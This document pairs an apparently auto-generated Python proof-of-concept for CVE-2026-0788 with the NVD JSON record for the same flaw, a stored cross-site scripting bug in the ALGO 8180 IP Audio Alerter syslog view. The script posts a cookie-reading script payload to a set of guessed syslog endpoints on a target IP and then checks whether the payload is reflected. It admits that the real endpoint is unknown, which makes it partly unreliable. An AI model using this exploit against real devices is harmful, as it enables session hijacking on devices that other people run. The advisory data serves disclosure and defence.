CVE-2026-0788

import requests # CVE-2026-0788 PoC - ALGO 8180 IP Audio Alerter Stored XSS # Target: ALGO 8180 IP Audio Alerter Web UI syslog function target_ip = "192.168.1.100" # Replace with target device IP target_port = 80 # Malicious XSS payload xss_payload = "<script>alert(document.cookie)</script>" # Method 1: Inject via syslog functionality # Note: Actual exploitation requires identifying the specific syslog injection endpoint def inject_xss_payload(): """ Attempt to inject XSS payload into syslog The actual endpoint and parameter names need to be identified through enumeration Common endpoints might include: - /cgi-bin/syslog - /log/syslog - /admin/syslog """ endpoints = [ "/cgi-bin/syslog", "/log/syslog", "/admin/syslog", "/api/syslog" ] for endpoint in endpoints: url = f"http://{target_ip}:{target_port}{endpoint}" headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0" } data = { "message": xss_payload, "source": "PoC-Test" } try: response = requests.post(url, data=data, headers=headers, timeout=5) print(f"[*] Sent payload to {url} - Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error targeting {url}: {e}") # Method 2: Verify XSS exists by checking syslog page def verify_xss(): """ Verify if the XSS payload is reflected in the syslog page """ syslog_url = f"http://{target_ip}:{target_port}/cgi-bin/syslog" try: response = requests.get(syslog_url, timeout=5) if xss_payload in response.text: print("[+] XSS vulnerability confirmed - Payload stored in syslog") return True else: print("[-] XSS payload not found in response") return False except requests.exceptions.RequestException as e: print(f"[!] Error verifying XSS: {e}") return False if __name__ == "__main__": print("[*] CVE-2026-0788 PoC - ALGO 8180 Stored XSS") print("[*] Note: Authentication may be required depending on configuration") # Uncomment to execute # inject_xss_payload() # verify_xss()

{"cve": {"id": "CVE-2026-0788", "sourceIdentifier": "[email protected]", "published": "2026-01-23T04:16:06.447", "lastModified": "2026-02-13T21:09:41.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ALGO 8180 IP Audio Alerter Web UI Persistent Cross-Site Scripting Vulnerability. This vulnerability allows remote attackers to execute web requests with a target user's privileges on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the functionality for viewing the syslog. The issue results from the lack of proper validation of user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this vulnerability to interact with the application in the context of the target user. Was ZDI-CAN-28298."}, {"lang": "es", "value": "Vulnerabilidad de Cross-Site Scripting Persistente en la UI web de ALGO 8180 IP Audio Alerter. Esta vulnerabilidad permite a atacantes remotos ejecutar solicitudes web con los privilegios de un usuario objetivo en instalaciones afectadas de dispositivos ALGO 8180 IP Audio Alerter. No se requiere autenticación para explotar esta vulnerabilidad.\n\nLa falla específica existe dentro de la funcionalidad para ver el syslog. El problema resulta de la falta de validación adecuada de los datos proporcionados por el usuario, lo que puede llevar a la inyección de un script arbitrario. Un atacante puede aprovechar esta vulnerabilidad para interactuar con la aplicación en el contexto del usuario objetivo. Fue ZDI-CAN-28298."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:algosolutions:8180_ip_audio_alerter_firmware:5.5:*:*:*:*:*:*:*", "matchCriteriaId": "853BF5C9-122B-4F47-9CE7-DA3E307130ED"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:algosolutions:8180_ip_audio_alerter:-:*:*:*:*:*:*:*", "matchCriteriaId": "3A20E73F-D499-4973-ADDE-8B702E6F5254"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-010/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}